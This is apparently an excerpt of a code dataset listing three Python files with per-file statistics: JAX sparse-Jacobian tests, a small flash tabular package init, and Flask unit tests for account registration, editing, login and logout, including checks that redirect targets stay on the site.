fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_1d_nonlinear(self):
fn = lambda x: jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='valid')**2
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE - 2), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i + 1) == j) | ((i + 2) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
actual = sparsejac.jacfwd(fn, sparsity)(x)
onp.testing.assert_array_equal(jax.jacrev(fn)(x), actual.todense())
def test_convolutional_2d(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacfwd(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_convolutional_2d_nonlinear(self):
shape_2d = (20, 20)
def fn(x_flat):
x = jnp.reshape(x_flat, shape_2d)
result = jax.scipy.signal.convolve2d(x, jnp.ones((3, 3)), mode='valid')
return result.flatten()**2
x_flat = jax.random.uniform(
jax.random.PRNGKey(0), shape=(shape_2d[0] * shape_2d[1],))
expected = jax.jacrev(fn)(x_flat)
sparsity = jsparse.BCOO.fromdense(expected != 0)
actual = sparsejac.jacfwd(fn, sparsity)(x_flat)
onp.testing.assert_array_equal(expected, actual.todense())
def test_argnums(self):
def fn(x, y, z):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
return y * convolved + z
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
y = jax.random.uniform(jax.random.PRNGKey(1), shape=(_SIZE,))
z = jax.random.uniform(jax.random.PRNGKey(2), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
with self.subTest():
result = sparsejac.jacfwd(fn, sparsity, argnums=0)(x, y, z)
expected = jax.jacfwd(fn, argnums=0)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacfwd(fn, sparsity, argnums=1)(x, y, z)
expected = jax.jacfwd(fn, argnums=1)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
with self.subTest():
result = sparsejac.jacfwd(fn, sparsity, argnums=2)(x, y, z)
expected = jax.jacfwd(fn, argnums=2)(x, y, z)
onp.testing.assert_array_equal(expected, result.todense())
def test_has_aux(self):
def fn(x):
convolved = jnp.convolve(x, jnp.asarray([1., -2., 1.]), mode='same')**2
aux = x + 1
return convolved, aux
x = jax.random.uniform(jax.random.PRNGKey(0), shape=(_SIZE,))
i, j = jnp.meshgrid(jnp.arange(_SIZE), jnp.arange(_SIZE), indexing='ij')
sparsity = (i == j) | ((i - 1) == j) | ((i + 1) == j)
sparsity = jsparse.BCOO.fromdense(sparsity)
result_jac, result_aux = sparsejac.jacfwd(fn, sparsity, has_aux=True)(x)
expected_jac, expected_aux = jax.jacfwd(fn, has_aux=True)(x)
onp.testing.assert_array_equal(expected_jac, result_jac.todense())
onp.testing.assert_array_equal(expected_aux, result_aux)
class ConnectivityFromSparsityTest(unittest.TestCase):
def test_output_connectivity_matches_expected(self):
sparsity = onp.asarray(
[[1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 1],
[1, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1]])
sparsity = ssparse.coo_matrix(sparsity)
expected = jnp.asarray(
[[1, 1, 1, 0, 1, 1],
[1, 1, 1, 1, 0, 1],
[1, 1, 1, 1, 0, 1],
[0, 1, 1, 1, 0, 1],
[1, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1]])
actual = sparsejac._output_connectivity_from_sparsity(sparsity)
onp.testing.assert_array_equal(expected, actual.todense())
def test_input_connectivity_matches_expected(self):
sparsity = onp.asarray(
[[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1]])
sparsity = ssparse.coo_matrix(sparsity)
expected = jnp.asarray(
[[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 1]])
actual = sparsejac._input_connectivity_from_sparsity(sparsity)
onp.testing.assert_array_equal(expected, actual.todense())
if __name__ == '__main__':
unittest.main(argv=[''], verbosity=2, exit=False) | 39.652956 | 80 | 0.644279 | 2,246 | 15,425 | 4.301425 | 0.058771 | 0.011593 | 0.012732 | 0.081151 | 0.954663 | 0.95456 | 0.951661 | 0.940482 | 0.926509 | 0.906635 | 0 | 0.028816 | 0.190081 | 15,425 | 389 | 81 | 39.652956 | 0.744497 | 0.001426 | 0 | 0.833333 | 0 | 0 | 0.032537 | 0 | 0 | 0 | 0 | 0 | 0.132075 | 1 | 0.125786 | false | 0 | 0.025157 | 0 | 0.185535 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2f72c5e850a9f5690f94092a52b49a578aaf6ebd | 123 | py | Python | flash/tabular/classification/__init__.py | alvin-chang/lightning-flash | 481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5 | [
"Apache-2.0"
] | 2 | 2021-06-25T08:42:36.000Z | 2021-06-25T08:49:29.000Z | flash/tabular/classification/__init__.py | alvin-chang/lightning-flash | 481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5 | [
"Apache-2.0"
] | null | null | null | flash/tabular/classification/__init__.py | alvin-chang/lightning-flash | 481d4d369ff0a5d8c2b2d9e4970c5608a92b3ff5 | [
"Apache-2.0"
] | null | null | null | from flash.tabular.classification.data import TabularData
from flash.tabular.classification.model import TabularClassifier
| 41 | 64 | 0.886179 | 14 | 123 | 7.785714 | 0.642857 | 0.165138 | 0.293578 | 0.550459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065041 | 123 | 2 | 65 | 61.5 | 0.947826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f9eee50d49ca74e3e2a31f70e1e7047ebbfa327 | 16,860 | py | Python | src/backend/web/handlers/tests/account_test.py | guineawheek/ftc-data-take-2 | 337bff2077eadb3bd6bbebd153cbb6181c99516f | [
"MIT"
] | null | null | null | src/backend/web/handlers/tests/account_test.py | guineawheek/ftc-data-take-2 | 337bff2077eadb3bd6bbebd153cbb6181c99516f | [
"MIT"
] | null | null | null | src/backend/web/handlers/tests/account_test.py | guineawheek/ftc-data-take-2 | 337bff2077eadb3bd6bbebd153cbb6181c99516f | [
"MIT"
] | null | null | null | from typing import List
from unittest.mock import ANY, Mock, patch
from urllib.parse import parse_qsl, quote, urlparse
import pytest
from flask import session
from flask.testing import FlaskClient
import backend
from backend.web.handlers.conftest import CapturedTemplate
from backend.web.handlers.tests.helpers import get_page_title
def user_mock(registered: bool = True) -> Mock:
mock = Mock()
mock.is_registered = registered
return mock
def test_register_logged_out(web_client: FlaskClient) -> None:
response = web_client.get("/account/register")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/login"
assert dict(parse_qsl(parsed_response.query)) == {
"next": "http://localhost/account/register"
}
def test_register_unregistered(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/register")
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_register.html"
assert get_page_title(response.data) == "Account Registration - The Blue Alliance"
assert context["next"] is None
@pytest.mark.parametrize(
"next_url, expected",
[
("https://zachorr.com", None),
("ftp://localhost/account", None),
("localhost/account", "localhost/account"),
],
)
def test_register_unregistered_next(
next_url: str,
expected: str,
captured_templates: List[CapturedTemplate],
web_client: FlaskClient,
) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/register?next={}".format(quote(next_url)))
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_register.html"
assert get_page_title(response.data) == "Account Registration - The Blue Alliance"
assert context["next"] == expected
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_register_register(
next_url: str, expected: str, web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/register?next={}".format(quote(next_url)))
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/account")
def test_register_register_no_account_id(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.post("/account/register", data={"display_name": "Zach"})
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/"
def test_register_register_no_display_name(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.post("/account/register", data={"account_id": "abc"})
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/"
def test_register_register_account_id_mismatch(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.post(
"/account/register", data={"account_id": "efg", "display_name": "Zach"}
)
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/"
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_register_register_account(
next_url: str, expected: str, web_client: FlaskClient
) -> None:
mock = user_mock(registered=False)
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), patch.object(
mock, "register"
) as mock_register:
response = web_client.post(
"/account/register?next={}".format(quote(next_url)),
data={"account_id": "abc", "display_name": "Zach"},
)
mock_register.assert_called_with("Zach")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/account")
def test_edit_logged_out(web_client: FlaskClient) -> None:
response = web_client.get("/account/edit")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/login"
assert dict(parse_qsl(parsed_response.query)) == {
"next": "http://localhost/account/edit"
}
def test_edit_unregistered(web_client: FlaskClient) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/edit")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/register"
assert dict(parse_qsl(parsed_response.query)) == {
"next": "http://localhost/account/edit"
}
def test_edit(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/edit")
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert get_page_title(response.data) == "Edit Profile - The Blue Alliance"
assert context["status"] is None
def test_edit_no_account_id(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", data={})
assert session.get("account_edit_status") == "account_edit_failure"
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/edit"
def test_edit_no_account_id_follow_redirect(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", follow_redirects=True, data={})
assert session.get("account_edit_status") is None
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert context["status"] == "account_edit_failure"
def test_edit_mismatch_account_id(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", data={"account_id": "def"})
assert session.get("account_edit_status") == "account_edit_failure"
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/edit"
def test_edit_mismatch_account_id_follow_redirect(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post(
"/account/edit", follow_redirects=True, data={"account_id": "def"}
)
assert session.get("account_edit_status") is None
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert context["status"] == "account_edit_failure"
def test_edit_no_display_name(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post("/account/edit", data={"account_id": "abc"})
assert session.get("account_edit_status") == "account_edit_failure_name"
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/edit"
def test_edit_no_display_name_follow_redirect(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client:
response = web_client.post(
"/account/edit", follow_redirects=True, data={"account_id": "abc"}
)
assert session.get("account_edit_status") is None
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
context = captured_templates[0][1]
assert template.name == "account_edit.html"
assert context["status"] == "account_edit_failure_name"
def test_edit_success(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
mock = user_mock()
mock.uid = "abc"
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), web_client, patch.object(
mock, "update_display_name"
) as mock_update_display_name:
response = web_client.post(
"/account/edit", data={"account_id": "abc", "display_name": "Zach"}
)
assert session.get("account_edit_status") is None
mock_update_display_name.assert_called_with("Zach")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account"
def test_logout_logged_out(web_client: FlaskClient) -> None:
response = web_client.get("/account/logout")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account/login"
assert dict(parse_qsl(parsed_response.query)) == {
"next": "http://localhost/account/logout"
}
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_logout_unregistered(
next_url: str, expected: str, web_client: FlaskClient
) -> None:
mock = user_mock(registered=False)
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "revoke_session_cookie"
) as mock_revoke_session_cookie:
response = web_client.get("/account/logout?next={}".format(quote(next_url)))
assert mock_revoke_session_cookie.called
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/")
@pytest.mark.parametrize(
"next_url, expected",
[
("", None),
("https://zachorr.com", None),
("ftp://localhost/mytba", None),
("http://localhost/mytba", "/mytba"),
("/mytba", "/mytba"),
],
)
def test_logout(next_url: str, expected: str, web_client: FlaskClient) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "current_user", return_value=mock
), patch.object(
backend.web.handlers.account, "revoke_session_cookie"
) as mock_revoke_session_cookie:
response = web_client.get("/account/logout?next={}".format(quote(next_url)))
assert mock_revoke_session_cookie.called
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == (expected if expected else "/")
def test_login_logged_in(web_client: FlaskClient) -> None:
mock = user_mock()
with patch.object(
backend.web.handlers.decorators, "current_user", return_value=mock
), patch.object(backend.web.handlers.account, "current_user", return_value=mock):
response = web_client.get("/account/login")
assert response.status_code == 302
parsed_response = urlparse(response.headers["Location"])
assert parsed_response.path == "/account"
def test_login(
captured_templates: List[CapturedTemplate], web_client: FlaskClient
) -> None:
response = web_client.get("/account/login")
assert response.status_code == 200
assert len(captured_templates) == 1
template = captured_templates[0][0]
assert template.name == "account_login_required.html"
assert get_page_title(response.data) == "The Blue Alliance - Login Required"
def test_login_no_id_token(web_client: FlaskClient) -> None:
response = web_client.post("/account/login")
assert response.status_code == 400
def test_login_success(web_client: FlaskClient) -> None:
with patch.object(
backend.web.handlers.account, "create_session_cookie"
) as mock_create_session_cookie:
response = web_client.post("/account/login", data={"id_token": "abc"})
mock_create_session_cookie.assert_called_with("abc", ANY)
assert response.status_code == 200
assert response.get_json() == {"status": "success"}
| 34.762887 | 86 | 0.690985 | 2,002 | 16,860 | 5.593906 | 0.05994 | 0.045808 | 0.069113 | 0.076882 | 0.910081 | 0.900527 | 0.874364 | 0.858112 | 0.851326 | 0.847576 | 0 | 0.007812 | 0.180012 | 16,860 | 484 | 87 | 34.834711 | 0.802242 | 0 | 0 | 0.739691 | 0 | 0 | 0.157058 | 0.024318 | 0 | 0 | 0 | 0 | 0.21134 | 1 | 0.06701 | false | 0 | 0.023196 | 0 | 0.092784 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.